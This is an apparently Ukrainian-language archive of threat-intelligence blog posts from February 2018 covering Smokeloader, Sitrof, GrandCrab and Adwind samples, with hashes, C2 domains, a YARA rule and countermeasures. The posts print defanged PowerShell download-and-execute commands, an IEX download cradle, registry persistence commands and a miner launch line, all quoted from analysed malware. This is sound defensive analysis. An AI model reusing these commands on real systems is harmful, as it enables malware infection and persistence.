Archive | infosec RSS for this section

IOC_sitrof_smokeldr_230218

Доброго вечора, панове.

До вашої уваги підсумки по сьогоднішнім зразкам.

Отже на аналіз було передано: уже знайомий нам #smokeloader та троян #sitrof (fortis).

Рівень загрози по обом – середній. Для тих, хто уважно читає наші поради – низький в обох випадках.

 

Трохи аналітики:

#smokeloader

 

  • Враховуючи почерк цієї команди слід очікувати нових зразків із цим посиланням
  • Схема не змінилася – обфусковані JS скрипти в архіві
  • Скрипт чітко вказує адресу та ім’я, під яким payload записується на диск
  • Завантаження основної частини засобами Powershell
  • Не потребує прав Адміністратора
  • Цього разу змінили домен та застосували обфускацію команд при передачі

#sitrof

  • Цей штам дуже мало застосовувався
  • Повторний запуск = новий клон (розмір*2, інше ім’я, мімікрія під системні файли) – цей модуль взяли у #zbot
  • Чітка атрибутика (завдяки Techhelplist) по User Agent (POST /ftsri.php?reg)
  • Не потребує прав Адміністратора
  • Пристосований до збору інформації
  • Говорити про нього як про інструмент складної атаки не варто, це швидше розвідка за допомогою нетипового семплу
  • Проте він досить “незграбний” і створює багато артефактів, тому схиляюсь до думки що це потяг до екзотики, а не прояв майстерності
  • Вносить зміни в реєстр щоб приховати своє тіло (старий трюк)

 

Схема атаки:

 

#smokeloader

 

email > Attach (RAR) > JS > WSCRIPT > CMD > Powershell > single hardcoded URL >

'h11p:\ vivedoc{.} ru/document/pax.exe' >  $env:temp + '\1004.exe

* (минулого разу – enterwords{.} ru/uadoc/crsse.exe > 11054.exe, до того - 63753.exe, а ще раніше 5541.exe)

 

#sitrof

Вектор доставки не підтверджено.

 

Маркери IOC:

 

#smokeloader

Приєднання (архів):

SHA-256            843f898ca145f00e643019c64376491882431fbbc4f187cd6e011050375c6829
File name            рахунок фактура 21.02.2018р.rar
File size              85.71 KB

 

скрипт приманка:

SHA-256            3010c97b0589cc954574e209f93cf4499e64cf812fb12b37e1aec7b0e4ffbedd
File name           рах.фак. 75-КТ.xls.js
File size              33.47 KB

основна частина:

SHA-256            e67bc39af0cd4e5bf5d346927c06c2af2d9209d794ad98c9387d797b914f3423
File name           pax.exe >> $env:temp + '\1004.exe
File size              345 KB

 

#sitrof

основна частина:

SHA-256            59ab6cb69712d82f3e13973ecc7e7d2060914cea6238d338203a69bac95fd96c
File name           System Volume Information.exe
File size              41.56 KB

Наступні ітерації запуску:

>2га
SHA-256    21a25b82388ff6794dcfecf238d035c6f71cfd7a453f1123c4f3bd01b0425df6
File name   mstray.exe
File size    83.13 KB

>3тя
SHA-256        af4d350c56c49fe3353d3ccb9fd10507e8ac35ccced7a90abd66d12b06447275
File name   ftshost.exe
File size    166.26 KB

>4та
SHA-256        86dd5923f69f8530c7cb7107dcca0b5518fcf7cb249da19551a2f963d40e63be
File name   mshost.exe
File size    332.52 KB

>5та
SHA-256    5b2740e47f7dace861e9e6619936fbaeb93a3834ee19f7bfc4f979cdb12cdf69
File name   mssvc.exe
File size    665.04 KB

 

Мережеві IOC:

 

#smokeloader

 

завантаження payload – досі активна!

104.18.59.143    vivedoc{.} ru      GET /document/pax.exe HTTP/1.1
(минулого разу -  92.63.197.13      enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1)

 

трафік скомпрометованої системи – сервер контролю (так само як і минулого разу)

92.63.197.13      honeyindoc{.} ru POST / HTTP/1.1  (application/x-www-form-urlencoded)

 

#sitrof

c2 :

yourssagregator{.} comlu{.} com/ftsri.php
allnewsmedia{.} webatu{.} com/ftsri.php

 

Передача зібраної інформації (система, користувач, CPU)

153.92.0.100      HTTP 346   lovecatalog{.} comlu{.} com POST /ftsri.php?reg&ver=4.100000&comp=agent&addinfo=test@agent;%202%20x86%20"Intel"%20processor(s) HTTP/1.1
153.92.0.100      HTTP 215   yourssagregator{.} comlu{.} com  POST /ftsri.php?get&version HTTP/1.1
153.92.0.100      HTTP 244   yourssagregator{.} comlu{.} com  GET /ftsri.php?get&module=\023=K6\263\023;W\03#JEB HTTP/1.1

 

Трафік скомпрометованої системи

mshost.exe1600               TCP        153.92.0.100       80           CLOSE_WAIT                                                                                                                     
mshost.exe1600               TCP        153.92.0.100       80           CLOSE_WAIT                                                                                                                                     
mshost.exe1600               TCP        104.20.67.46       443         CLOSE_WAIT

 

Активність по процесам:

 

#smokeloader

 

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

Ліричний відступ, нагадую, що ENS обладнано сигнатруами для блокування певних команд Powershell

Їх просто потрібно активувати:

На відміну від минулого разу застосували ще сильнішу обфускацію команд

 

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\рах.фак. 75-КТ.xls.js"

"C:\Windows\System32\cmd.exe" /k set _a111=powe&& set _a222=rsh&& set _a333=ell&& call %_a111%%_a222%%_a333% $CsbSHQUu = 'GyxDSwG';$a = 'Msxml' + '2.XML' + 'HTTP';$z5iLQa8 = 'pIPBA';$b = 'ADO' + 'DB.' + 'Stream';$kacCc = 'mEKyiYy1';$c = 'G' + 'E' + 'T';$JnheMsVo = 'SHblsw';$d = 1 - 1 + 1;$pDhstfie = 'zwqEzO';$hr = New-Object -ComObject $a;$ddbeu = 'KfHL80';$ab = New-Object -ComObject $b;$jUi2Pmko = 'GNbYLYU';$path = $env:temp + '\1004.exe';$Nn8NG = 'ISrrb';$hr.open($c, 'http://vivedoc{.} ru/document/pax.exe', 0);$FbWdaAPm = 'MuwGl';$hr.send();$tkzNp = 'aummFLV';$NWHLjOHp = 'TXzrW';$hryQYP = 'NipavHP';$otGXcz = 'YxEi0';$ab.open();$leJkI = 'b7CaDKAEf';$ab.type = $d;$XhzVqK = 'uG0QddHO';$ab.write($hr.responseBody);$RZAQmIf3 = 'xckwyBI';$ab.savetofile($path);$zGsspdDz = 'rZ4chUv';$ab.close();$zyOHSXL = 'PyCybbp';$cOo8LIl = 'C7ms3yUc';$Cexglw = 'YI128';$ankqLgZP = 'TKwSsN';$DgphQkeP = 'orASsm';$cwndO = 'cJPoPB';$bXBnK = 'HzkFOlL';Start-Process $path;

powershell  $CsbSHQUu = 'GyxDSwG';$a = 'Msxml' + '2.XML' + 'HTTP';$z5iLQa8 = 'pIPBA';$b = 'ADO' + 'DB.' + 'Stream';$kacCc = 'mEKyiYy1';$c = 'G' + 'E' + 'T';$JnheMsVo = 'SHblsw';$d = 1 - 1 + 1;$pDhstfie = 'zwqEzO';$hr = New-Object -ComObject $a;$ddbeu = 'KfHL80';$ab = New-Object -ComObject $b;$jUi2Pmko = 'GNbYLYU';$path = $env:temp + '\1004.exe';$Nn8NG = 'ISrrb';$hr.open($c, 'http://vivedoc{.} ru/document/pax.exe', 0);$FbWdaAPm = 'MuwGl';$hr.send();$tkzNp = 'aummFLV';$NWHLjOHp = 'TXzrW';$hryQYP = 'NipavHP';$otGXcz = 'YxEi0';$ab.open();$leJkI = 'b7CaDKAEf';$ab.type = $d;$XhzVqK = 'uG0QddHO';$ab.write($hr.responseBody);$RZAQmIf3 = 'xckwyBI';$ab.savetofile($path);$zGsspdDz = 'rZ4chUv';$ab.close();$zyOHSXL = 'PyCybbp';$cOo8LIl = 'C7ms3yUc';$Cexglw = 'YI128';$ankqLgZP = 'TKwSsN';$DgphQkeP = 'orASsm';$cwndO = 'cJPoPB';$bXBnK = 'HzkFOlL';Start-Process $path;

"C:\tmp\1004.exe"

 

Закріплення через HCU (так само як і минулого разу)

 

Policies                      c:\users\operator\appdata\roaming\microsoft\tjerrirf\rtdiubth.exe           
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf
HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run

 

#sitrof

Після запуску дублює своє тіло у довільний підкаталог operator\AppData\Roaming\Microsoft\*\ (SDL, DLL, etc)

Свою копію додає до списку автозавантаження

Ліричний відступ, нагадую, що ENS обладнано вбудованим правило для блокування такої активності

Просто активуйте правило:

 

"C:\Users\operator\Desktop\System Volume Information.exe"
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v mqkldrv /t REG_SZ /d "C:\Users\operator\AppData\Roaming\Microsoft\bin\mshost.exe" /f


"C:\Users\operator\AppData\Roaming\Microsoft\bin\mshost.exe"
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v mqkldrv /t REG_SZ /d "C:\Users\operator\AppData\Roaming\Microsoft\bin\mshost.exe" /f
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0x00000000 /f
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 0x00000001 /f

 

Закріплення

mqkldrv                     c:\users\operator\appdata\roaming\microsoft\bin\mshost.exe        02.09.2007 13:34

McAfee

YARA (c) @ Techhelplistcom

 

rule sitrof_fortis {

meta:
author = ” J from THL <j@techhelplist.com>”
date = “2018/23”
reference = “https://www.virustotal.com/#/file/59ab6cb69712d82f3e13973ecc7e7d2060914cea6238d338203a69bac95fd96c/community&#8221;
version = 1
maltype = “Stealer”
filetype = “memory”

strings:

$a = “?get&version”
$b = “?reg&ver=”
$c = “?get&exe”
$d = “?get&download”
$e = “?get&module”
$f = “&ver=”
$g = “&comp=”
$h = “&addinfo=”
$i = “%s@%s; %s %s \”%s\” processor(s)”
$j = “User-Agent: fortis”

condition:
6 of them
}

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • (#sitrof) YARA правило для визначення активності – дякую Techhelplist
  • (#sitrof) Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • (#smokeloader) Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
  • (#smokeloader) Деактивація механізму Windows Script Host (варіант 2й)
  • (#smokeloader) Якщо ж Powershell активно застосовується – нагадую про вбудовані можливості McAfee ENS – сигнатури Exploit Prevention
  • (обидва зразки) Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • (#smokeloader) Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

IOC_smokeldr_150218

Доброго вечора, панове.

Сьогодні було зафіксовано повторну спробу доставки троянського коду типу Smokeloader (Chanitor).

Схема та ж сама, що ми вже бачили 30го числа та 6го числа.

Користувачі захисту кінцевих точок McAfee зверніть увагу – сам завантажувач та майнер детектуються.

Трохи аналітики:

  • Доставка – через обфусковані JS скрипти оболонці ZIP
  • Скрипт містить одну чітко вказану адресу, а основна частина записується з чітко заданим іменем файлу
  • Був використаний той же скрипт та ім’я сайту з минулої та позаминулої розсилки
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Цього разу цикл роботи повний – smokeloader спричинив завантаження та запуск Monero Miner.

 Схема атаки:

email > Attach (ZIP) > JS > WSCRIPT > CMD > Powershell > single hardcoded URL > GET > %temp%\11054.exe  (минулого разу - 63753.exe, позаминулого разу - 5541.exe)

Маркери IOC:

Приєднання (архів):

File name   Перечень.zip

SHA-256        ce848bb1cd63e5d12fe1a2da7b9f487282b061418dd5c8fcd6cf84b7456a3235

File size      21.72 KB

 

скрипт приманка:

File name   Описание продукции.js

SHA-256        4e54a1d40d583c655605a47ea36f69ea16bcc8df4e4d72370e3ebcfe71134a54

File size      18.88 KB

основна частина:

File name   crsse.exe >> 11054.exe >> rtdiubth.exe

SHA-256        5e8f227c91db834f536a016d014a277dd89f1e3b3e939761dc4847e260e9a89a

File size      300 KB

Monero miner:

File name   curl.exe

SHA-256    fc9a32ecce00b4b2d711fe9bda120c9f82f3c2405f3658d30f4dbdac5cedde26

File size      986.5 KB

Мережеві IOC:

 

завантаження payload – досі активна!

92.63.197.13      enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1

(минулого разу - 104.31.86.241    enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1)

трафік скомпрометованої системи – сервер контролю

92.63.197.13      honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

92.63.197.13      honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

92.63.197.13      honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

(минулого разу - 104.27.140.34    honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

 

Завантаження та активація Monero Miner

92.63.197.13      HTTP 134   parodadoca[.]ru  GET /panel/mr/curl.exe HTTP/1.1

92.63.197.13      HTTP 457   parodadoca[.]ru  GET /panel/gate.php?machine_id=?&x64=False&version=1&video_card=?cpu=?&junk=15.02.2018%2017:08:03 HTTP/1.1

92.63.197.13      HTTP 108   parodadoca[.]ru  GET /panel/updmr.php HTTP/1.1

92.63.197.13      HTTP 108   parodadoca[.]ru  GET /panel/updbt.php HTTP/1.1

Активність по процесам:

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell


"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Описание продукции.js"

"C:\Windows\System32\cmd.exe" /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\11054.exe';$http_request.open('GET', 'h11p:\enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

powershell  $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\11054.exe';$http_request.open('GET', ' h11p:\enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\11054.exe"

C:\Windows\SysWOW64\explorer.exe

C:\tmp\4A0C.tmp.exe

Запуск та ініціалізація майнера:

"C:\Users\operator\AppData\Roaming\MicroMon\curl.exe" -o pool.minexmr[.]com:4444 -u 43Zg4SdBjs3gh6g -p x --cpu-affinity 75

C:\Windows\SysWOW64\explorer.exe

Закріплення через HCU (так само як і минулого разу)

 

Clients                       c:\users\operator\appdata\roaming\microsoft\tjerrirf\rtdiubth.exe             

HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_pdf>doc_0218

Усім привіт!.

Хочемо звернути вашу увагу на схему, яка застосовується останніми днями для розповсюдження Dridex, Grancrab Ransomware та QuantLoader.

Станом на ранок 9го лютого звернень по цим зразкам від українських організацій не надходило.

Проте варто підготуватися до застосування такої тактики проти наших систем.

Зразки коду були взяті з http://www.malware-traffic-analysis.net/

Як це виглядає:

  1. Жертва отримує фейкового листа із посиланням на “важливий” документ.
  2. Після завантаження та відкриття PDF жертва бачить пусту сторінку і зображення капчі.
  3. Клік по капчі містить посилання на DOC файл.
  4. При відкритті DOC файлу жертву просять активувати макроси.
  5. Активація макросу призводить до інфікування.

Ознайомте персонал із знімками екрану PDF та DOC файлу.

Попередьте, що зображення можуть замінити.

Забороніть передачу керування від MS Office на CMD та Powershell.

Результат перевірки документів

Схема атаки:

email > URL > PDF > DOC > Maco > Powershell / CMD > GET > .exe

Маркери за 7/02/18 – розповсюдження GrandСrab Ransomware

Активність по процесам:



"C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe" "C:\Users\operator\Desktop\grandcrab\attachments\Feb-3178376.pdf"
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "h11p\\butcaketforthen[.]com/docs/Feb-00974.doc"
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
cmd.exe /c START "" %SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('h11p\\sorinnohoun[.]com/sc1/sct5'));Invoke-GandCrab;Start-Sleep -s 1000000;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('h11p\\sorinnohoun[.]com/sc1/sct5'));Invoke-GandCrab;Start-Sleep -s 1000000;"
C:\Windows\SysWOW64\nslookup.exe
nslookup nomoreransom[.]coin dns1.soprodns[.]ru
"C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /f /q
timeout  -c 5

 

Мережева активність:

119.28.111.49      HTTP  370    butcaketforthen[.]com    GET /docs/Feb-00974.doc HTTP/1.1
119.28.111.49      HTTP  127    sorinnohoun[.]com GET /sc1/sct5 HTTP/1.1
151.248.118.75    HTTP  4387  nomoreransom[.]coin      POST /curl.php?token=1018 HTTP/1.1  (application/x-www-form-urlencoded)

Зверніть увагу на “фішку” GrandСrab – використання інакших DNS серверів для резолву серверів контролю 

10.10.10.10 DNS   89               Standard query 0x4908 A ipv4bot.whatismyipaddress[.]com
10.10.10.10 DNS   76               Standard query 0xac2e A dns1.soprodns[.]ru
193.0.179.152      DNS   77               Standard query 0x0002 A nomoreransom[.]coin

Частина скрипта інжекту Powershell

GET /sc1/sct5 HTTP/1.1
Host: sorinnohoun[.]com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 09 Feb 2018 08:04:51 GMT
Content-Type: application/octet-stream

function Invoke-Inj
{
<#
.SYNOPSIS

This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.

# # # # #

Маркери за 8/02/18 – розповсюдження Quant Loader

Активність по процесам:

"C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe" "C:\Users\operator\Desktop\0820\08.02.2018_7719830.pdf"
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "h11p\\hinenreb[.]com/docs/08.02.2018.doc"
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe cmd.exe /c START "" C:\tmp\rozabich8.exe
C:\tmp\rozabich8.exe

Мережева активність:

119.28.111.49      HTTP  364    hinenreb[.]com     GET /docs/08.02.2018.doc HTTP/1.1
119.28.111.49      HTTP  278    pertalted[.]com     GET /p66/yutg5 HTTP/1.1

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Ознайомити персонал із послідовністю атак, показати знімки екранів PDF та DOC файлів – щоб не клацали!
  • Блок макросів, блок посилань у PDF файлах
  • Відстеження спроб виклику nslookup (притаманно інфікуванню GrandCrab)
  • Заборона створення дочірніх процесів (передача керування) MW Office > CMD > Powershell
  • Блокування доступу до мережі Інтернет для процесів Powershell (варіант 1й)
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона вихідних мережевих зєднань для процесів Powershell
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Adwind_070218

Доброго вечора, панове.

Сьогодні зранку зафіксовано спробу доставки загрози типу Adwind (Java backdoor).

Ми з ним уже “знайомі”: розибрав у червні 16го, у травні 17го, на початку вересня 17го та 12го жовтня.

В групі ризику – працівники бухгалтерії (ДБО) та користувачі самописного софту якому потрібен JRE.

Рівень загрози для систем на яких встановлено Java Runtimeвисокий.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Цього разу примітивно, без обгортки, просто JAR у приєднанні.

Рейтинг приманки на VT jar – 9/60.

Даний клас зразків використовується для збору інформації, виведення облікових даних та віддаленого керування.

Схема атаки:

email > .JAR > %temp%\*.JAR, *.class & *.vbs > %Userprofile%\EALtjyLyxBW\

Маркери IOC:

File name   SKMBT_C02072018.jar
SHA-256        abd38eea774ca43a7df3d4e173b07fcee809e2bb0d9ae6d8fd7021610938e7ce
File size      534.01 KB

При запуску JAR файлу активується процес закріплення в системі:

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\operator\Desktop\decoded.jar"

– зверніть увагу, в пам’ять системи завантажується оригінальний/дійсний файл Java, шкідливі інструкції подаються через параметр

 

"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.92849276228029881768736636918737462.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive8012862021299542926.vbs
cscript.exe  C:\tmp\Retrive8012862021299542926.vbs

– виконуючи шкідливий код Java видобуває із Jar архіву низку скриптових файлів необхідних для виконання закріплення в системі

 

"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

– важливий момент – інструкціями передбачено дублювання запускних файлів JRE з Program Files у каталог %AppData%,

 

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NjLVawaQVWM /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\EALtjyLyxBW\mvisTvrDYHI.lovyGx\"" /f
=
NjLVawaQVWM   Java(TM) Platform SE binary  Oracle Corporation        c:\users\operator\appdata\roaming\oracle\bin\javaw.exe  21.06.2013 22:05               

– запис у автозавантаження через HCU

"attrib" +h "C:\Users\operator\EALtjyLyxBW\*.*"
"attrib" +h "C:\Users\operator\EALtjyLyxBW"

– приховує свої файли через атрибути файлової системи

 

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\EALtjyLyxBW\mvisTvrDYHI.lovyGx
"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.482691304425191373098301473738213403.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive5796149169918309765.vbs
cscript.exe  C:\tmp\Retrive5796149169918309765.vbs

– передача керування на файл з інструкціями з каталогу користувача

 

"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")
For Each objItem in colItems
 With objItem
 WScript.Echo "{""AV"":""" & .displayName & """}"
 End With
Next

Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
For Each objItem in colItems
 With objItem
 WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
 End With
Next
 

– збір інформації про

  • встановленні драйвери PnP пристроїв
  • антивірусне ПЗ
  • брандмауер

(!) може бути ознакою перевірки віртуального середовища або пошук апаратних ключів чи особливої ознаки (Scada контроллери чи POS пристрої)

Після закріплення в системі Adwind ініціює з’єднання із сервером контролю.

Мережеві IOC:

Мережева активність при інфікуванні – спроба з’єднатися із вузлом в TOR

DNS  102   Standard query response 0xe7ab A vvrhhhnaijyj6s2m[.]onion[.]top A 62.0.58.94

Трафік скомпрометованої системи:

java.exe    2208 TCP   127.0.0.1   49359        127.0.0.1   7777 SYN_SENT                                                                         
java.exe    1592 TCP   127.0.0.1   49362        127.0.0.1   7777 SYN_SENT                                                                         
javaw.exe  1464 TCP   10.0.2.15   49291        185.158.139.39 5017 ESTABLISHED

Що можна було зробити аби уникнути інфікування ?

  1. На системах робота яких не залежить від JRE, цей компонент можна та необхідно видалити – тоді код взагалі не запуститься
  2. Доставку JAR файлу можна було зупинити на рівні поштового шлюзу та proxy серверу (як приклад – Web та Email Gateway)
  3. Запис самого JAR в каталозі користувача можна заборонити відповідним правилом Access Protection
  4. Процес інфікування можна зупинити на початку, якщо застосувати правило заборони створення, запису та зчитування vbs файлів у каталозі %temp% (а краще AppData повністю)
  5. Якщо ж співробітнику потрібна і JRE і JAR файли, правилами AP можна заборонити процесу javaw зчитування та виконання JAR файлів із каталогу користувача – цей підхід теж досить дієвий (що правда тоді краще забороняти запуск і зчитування будь-яких файлів адже через параметр інструкції можуть подаватися з tmp )
  6. У кого наразі немає VSE/ENS із AP можуть деактивувати WSH – це поламає процес інфікування, але файли будуть створені і їх доведеться прибирати в ручному режимі або ж в автоматичному, але за допомогою MAR

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування JAR файлів на рівні каналів передачі Web та Email
  • Інвентаризація встановленого ПЗ і видалення JRE там, де він не є критично потрібним
  • Заборона створення та зчитування/запуску *.JAR, *.VBS з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_060218

Доброго дня, панове.

Вчора було зафіксовано повторну спробу доставки троянського коду типу Smokeloader (Chanitor).

Розсилка на 90% наслідує те, що ми вже бачили 30го числа.

Користувачі захисту кінцевих точок McAfee зверніть увагу як етектується dropper:

Трохи аналітики:

  • Доставка – через обфусковані JS скрипти оболонці RAR
  • Скрипт містить одну чітко вказану адресу, а основна частина записується з чітко заданим іменем файлу
  • Був використаний той же скрипт та ім’я сайту з минулої розсилки
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Запуск шкідливого коду не потребує прав Адміністратора

Схема атаки:

email > Attach (RAR) > JS > single hardcoded URL > GET > %temp%\63753.exe (минулого разу - 5541.exe)

Маркери IOC:

Приєднання (архів):

File name   сканирование гарантійний лист 05_02_2018.rar
SHA-256        6fde3aba8453cef14486e1446debaa7b19f321d9f1e7965bc8516478e5de905f
File size      77.89 KB

скрипт приманка:

File name   гарантійний лист 05_02_18р.xls.js
SHA-256        1d183616452133674366777206b102d234adf351829f4e5bb89079dd235d7930
File size      18.57 KB

основна частина:

File name   crsse.exe >> 63753.exe
SHA-256        f02281510c40d71893e000b4d1e11327e2eb76e999df23ba6876e7162eae5144
File size      281.5 KB

Мережеві IOC:

завантаження payload – досі активна!

104.31.86.241    enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1

трафік скомпрометованої системи – сервер контролю

104.27.140.34    honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

Активність по процесам:

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

Порівняння деобфускованих команд із розсилки за 30те число:

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\гарантійний лист 05_02_18р.xls.js"

"C:\Windows\System32\cmd.exe" /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\63753.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

powershell  $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\63753.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\63753.exe"

C:\Windows\SysWOW64\explorer.exe

Закріплення через HCU

HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
